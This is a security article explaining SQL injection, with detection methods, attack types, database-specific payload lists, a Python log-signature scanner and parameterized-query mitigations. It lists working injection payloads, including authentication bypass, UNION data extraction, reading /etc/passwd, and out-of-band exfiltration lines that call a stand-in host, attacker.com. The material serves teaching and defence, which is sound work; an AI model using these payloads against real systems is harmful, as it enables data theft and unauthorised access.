SQL Injection (SQLi) remains one of the most dangerous and widely exploited web application vulnerabilities, despite being well understood for decades. It consistently appears in the OWASP Top 10 because of its ease of exploitation and severe impact — from full database compromise to total business disruption.

This article provides a comprehensive technical and business-focused breakdown of SQL Injection, including:

  • What SQL is and how SQL Injection works
  • How to identify SQL injection vulnerabilities
  • Common and advanced SQLi payloads
  • Types of SQL injection attacks
  • Technical and business impact
  • Database-specific payloads (MySQL, MSSQL, PostgreSQL, SQLite, Oracle)
  • Effective mitigation strategies

What Is SQL?

SQL (Structured Query Language) is a standard language used to store, retrieve, update, and delete data in relational databases. Applications use SQL queries to interact with backend databases such as MySQL, Microsoft SQL Server, PostgreSQL, Oracle, and SQLite.

Example SQL query:

SELECT * FROM users WHERE username = 'admin' AND password = 'password123';  

When applications improperly handle user input, attackers can manipulate these queries — this is where SQL Injection begins.

What Is SQL Injection?

SQL Injection is a vulnerability that allows an attacker to inject malicious SQL code into an application's database query. This occurs when user input is concatenated directly into SQL statements without proper validation or parameterization.

Vulnerable Code Example

SELECT * FROM users WHERE username = '$username' AND password = '$password';

If an attacker enters:

' OR '1'='1

The query becomes:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';

Because AND binds more tightly than OR, the database reads this as username = '' OR ('1'='1' AND password = ''). The injected OR has changed the structure of the query rather than merely supplying a value: the condition is true for any account whose stored password is blank, and with the remainder of the clause commented out with -- (as in the authentication-bypass payloads below) it is true for every row, so the attacker is logged in without valid credentials.

How to Identify SQL Injection Vulnerabilities

1. Error-Based Indicators

  • SQL syntax errors in responses
  • Database error messages
  • HTTP 500 Internal Server Error after input manipulation

Example input:

'

Possible response:

You have an error in your SQL syntax near...

2. Boolean-Based Testing

Inject conditions and observe differences in responses.

' AND 1=1 --
' AND 1=2 --

If one returns normal content and the other does not, SQL injection is likely.

3. Time-Based Blind SQL Injection

Used when no output or error messages are displayed.

' AND SLEEP(5) --

If the response is delayed by roughly the requested number of seconds, the injected SQL is being executed by the database.

4. Out-of-Band Detection

Data is exfiltrated via DNS or HTTP requests from the database server.

LOAD_FILE(CONCAT('\\\\',(SELECT table_name FROM information_schema.tables LIMIT 1),'.attacker.com\\a'))
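The probing techniques in this section leave recognisable traces in web server logs. The following is an added example, not code from the article, that URL-decodes requests from Common Log Format lines and flags the signatures described above; the log lines are constructed samples and the signature set is an assumption covering only the functions named on this page:

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe techniques listed above, applied to the URL-decoded
# request. The lone-quote rule is deliberately narrow (quote at the end of a
# value) because apostrophes occur in ordinary input such as names.
SIGNATURES = {
    "error-probe":   re.compile(r"'\s*(?:$|&)"),
    "boolean-probe": re.compile(r"'\s*(?:AND|OR)\s+'?\d+'?\s*=\s*'?\d+", re.I),
    "time-probe":    re.compile(r"\b(?:SLEEP|pg_sleep)\s*\(|WAITFOR\s+DELAY|DBMS_PIPE\.RECEIVE_MESSAGE", re.I),
    "union-probe":   re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "oob-probe":     re.compile(r"\bLOAD_FILE\s*\(|UTL_HTTP\.REQUEST", re.I),
}

# Common Log Format (assumed): client, identd, user, [timestamp], "METHOD path HTTP/x", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_request(raw_path: str) -> list:
    """Return the labels of every signature that matches the decoded request path."""
    path = unquote_plus(raw_path)
    return [label for label, rx in SIGNATURES.items() if rx.search(path)]

def scan_log(lines) -> list:
    """Return (client_ip, decoded_path, labels) for each request that trips a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (labels := classify_request(m.group(2))):
            hits.append((m.group(1), unquote_plus(m.group(2)), labels))
    return hits

# Constructed access-log sample; these are not real log lines.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /products?id=42 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:10:15:02 +0000] "GET /report?name=O%27Brien HTTP/1.1" 200 640',
    '198.51.100.7 - - [12/Mar/2024:10:15:03 +0000] "GET /products?id=1%27 HTTP/1.1" 500 231',
    '198.51.100.7 - - [12/Mar/2024:10:15:04 +0000] "GET /search?q=%27%20AND%201%3D1%20-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2024:10:15:05 +0000] "GET /products?id=1%27%20AND%20SLEEP(5)-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2024:10:15:09 +0000] "GET /products?id=1%27%20UNION%20SELECT%20username%2C%20password%20FROM%20users%20-- HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, path, labels in scan_log(SAMPLE_LOG):
        print(f"{ip:14} {', '.join(labels):15} {path}")
```

Encoded variants (double URL-encoding, inline comments between keywords) will slip past these patterns, which is why the article treats signature matching as a supplementary control rather than a fix.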

Types of SQL Injection Attacks

1. In-Band SQL Injection

Data is retrieved using the same channel as the attack.

a. Error-Based SQL Injection

Relies on verbose database errors.

' AND 1=CAST((SELECT @@version) AS INT)--
' AND 1=CONVERT(INT, (SELECT @@version))--   
LIMIT CAST((SELECT version()) as numeric) 

b. Union-Based SQL Injection

Uses UNION SELECT to extract data.

' UNION SELECT username, password FROM users --
' UNION SELECT NULL, @@version, NULL--
' UNION SELECT 1, @@version, user() --

2. Blind SQL Injection

The application does not return query results directly.

a. Boolean-Based Blind SQLi

' AND (SELECT COUNT(*) FROM users)>0 --
' AND SUBSTRING(@@version,1,1)='M'--
' AND @@version LIKE 'Microsoft%'-- 

b. Time-Based Blind SQLi

' AND IF(1=1, SLEEP(5), 0) --
' IF (SUBSTRING(@@version,1,1)='M') WAITFOR DELAY '0:0:5'-- 
' OR IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --
' AND SLEEP(5)/*

3. Out-of-Band SQL Injection

Exploits features like DNS resolution or external requests.

'||(SELECT UTL_HTTP.REQUEST('http://'||(SELECT USER FROM DUAL)||'.attacker.com') FROM DUAL)||'

Common SQL Injection Payloads

Authentication Bypass

' OR '1'='1 --
admin' --

Data Enumeration

' UNION SELECT table_name, null FROM information_schema.tables --

Database Version Disclosure

' UNION SELECT @@version, null --

Database-Specific SQL Injection Payloads

MySQL / MariaDB

' OR 1=1 --
' UNION SELECT user(), database() --
' AND SLEEP(5) --
' UNION SELECT 1, table_name, 3 FROM information_schema.tables --
' UNION SELECT 1, @@version, user() --
' OR IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --
' UNION SELECT LOAD_FILE('/etc/passwd') --

Microsoft SQL Server (MSSQL)

' OR 1=1 --
' UNION SELECT @@version, name FROM sys.databases --
'; WAITFOR DELAY '00:00:05' --
' UNION SELECT @@version--
100;waitfor delay '0:0:10'--
' AND 1=CAST((SELECT @@version) AS INT)--
' AND SUBSTRING(@@version,1,1)='M'--
' AND @@version LIKE 'Microsoft%'-- 

SQLite

' OR 1=1 --
' UNION SELECT sqlite_version(), null --
' OR 1=1--
1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--
' UNION SELECT sqlite_version()-- 

PostgreSQL

' OR 1=1 --
' UNION SELECT version(), current_database() --
' AND pg_sleep(5) --

Oracle Database

' OR 1=1 --
' UNION SELECT banner FROM v$version --
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5) --

Technical Impact of SQL Injection

  • Unauthorized data access
  • Authentication bypass
  • Data manipulation or deletion
  • Database schema disclosure
  • Remote command execution (in extreme cases)
  • Complete backend compromise

Business Impact of SQL Injection

1. Data Breaches

Exposure of sensitive customer data, PII, credentials, or payment details.

2. Financial Loss

  • Regulatory fines (GDPR, HIPAA, PCI-DSS)
  • Incident response costs
  • Legal penalties

3. Reputational Damage

Loss of customer trust and brand credibility.

4. Operational Downtime

Application outages and service disruptions.

SQL Injection Mitigation Strategies

1. Parameterized Queries (Prepared Statements)

This is the most effective defense: the SQL text is fixed in the code and user input is bound to placeholders, so it is only ever treated as data and can never change the structure of the query.

SELECT * FROM users WHERE username = ? AND password = ?
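The following added example (not code from the article) implements the login from the Vulnerable Code Example section both ways in Python with sqlite3, using the ' OR 1=1 -- payload from the authentication-bypass list; the in-memory users table and its single account are constructed sample data:

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database with one account.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'password123')")


def build_vulnerable_query(username: str, password: str) -> str:
    """The article's vulnerable pattern: user input is pasted into the SQL text."""
    return (f"SELECT * FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(username: str, password: str) -> bool:
    """Executes the concatenated query; input can change the query's structure."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_parameterized(username: str, password: str) -> bool:
    """The fix: the SQL text is constant and input is bound to ? placeholders, so a
    quote or comment sequence in the input is just a string to compare against."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The article's payload: the -- comments out the rest of the WHERE clause.
BYPASS = "' OR 1=1 --"

if __name__ == "__main__":
    print(build_vulnerable_query(BYPASS, "x"))
    # SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'x'
    print(login_vulnerable("admin", "password123"))     # True  (normal login)
    print(login_vulnerable(BYPASS, "x"))                # True  (bypass: password check commented out)
    print(login_parameterized("admin", "password123"))  # True  (normal login)
    print(login_parameterized(BYPASS, "x"))             # False (payload is compared as a literal username)
```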

2. Stored Procedures (Safely Implemented)

Stored procedures only help when they do not build dynamic SQL from their arguments; a procedure that concatenates its input into a query string is just as injectable as application code.

3. Input Validation

  • Whitelisting allowed characters
  • Length checks
  • Reject unexpected input
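Parameterization covers values but not identifiers such as the column in an ORDER BY clause, which is where allow-listing earns its keep. The following added example (not code from the article) applies the three checks above in Python with sqlite3; the products table, its sortable columns and the username character set are constructed assumptions:

```python
import re
import sqlite3

# Constructed sample table for the demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                 [(1, "bolt", 0.25), (2, "anchor", 3.50), (3, "cable", 12.0)])

# Allow-lists: the only column names and sort directions the application will emit.
SORTABLE_COLUMNS = {"id", "name", "price"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
# Allowed characters plus a length check for a username (assumed policy).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_username(value: str) -> bool:
    """Allow-list the character set and length; used in addition to, not instead of, ? binding."""
    return USERNAME_RE.fullmatch(value) is not None


def sort_clause(sort_by: str, direction: str):
    """Return 'ORDER BY <col> <dir>' when both values are on the allow-list, else None.
    Only the application's own constant strings ever reach the SQL text."""
    if sort_by in SORTABLE_COLUMNS and direction in DIRECTIONS:
        return f"ORDER BY {sort_by} {DIRECTIONS[direction]}"
    return None


def list_products(sort_by: str, direction: str = "asc") -> list:
    """Reject unexpected sort parameters outright rather than trying to sanitise them."""
    clause = sort_clause(sort_by, direction)
    if clause is None:
        raise ValueError("unexpected sort parameter")
    return [row[0] for row in conn.execute(f"SELECT name FROM products {clause}")]


if __name__ == "__main__":
    print(validate_username("alice_01"), validate_username("' OR 1=1 --"))  # True False
    print(list_products("price", "desc"))                                   # ['cable', 'anchor', 'bolt']
    print(sort_clause("price; DROP TABLE products", "asc"))                 # None
```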

4. Least Privilege Principle

The account the application connects with should hold only the permissions it needs: no file-system access, no rights to alter the schema, and no access to databases it does not use. A successful injection is then limited to what that account can do.

5. Web Application Firewalls (WAF)

A WAF helps block known SQLi patterns, but it is a supplementary control: encoding variations and novel payloads routinely evade signature matching, so it must not replace parameterized queries.

6. Error Handling

Return a generic error page to users and log the full database error server-side; verbose errors are exactly what the error-based techniques above rely on.

7. Regular Security Testing

  • Static Application Security Testing (SAST)
  • Dynamic Application Security Testing (DAST)
  • Manual penetration testing

Final Thoughts

SQL Injection is not a legacy vulnerability — it is a modern threat that continues to cause large-scale breaches due to insecure coding practices. The combination of developer awareness, secure coding standards, and layered defenses is essential to eliminating SQLi risks.

If your application interacts with a database — and almost all do — SQL Injection should be treated as a top security priority.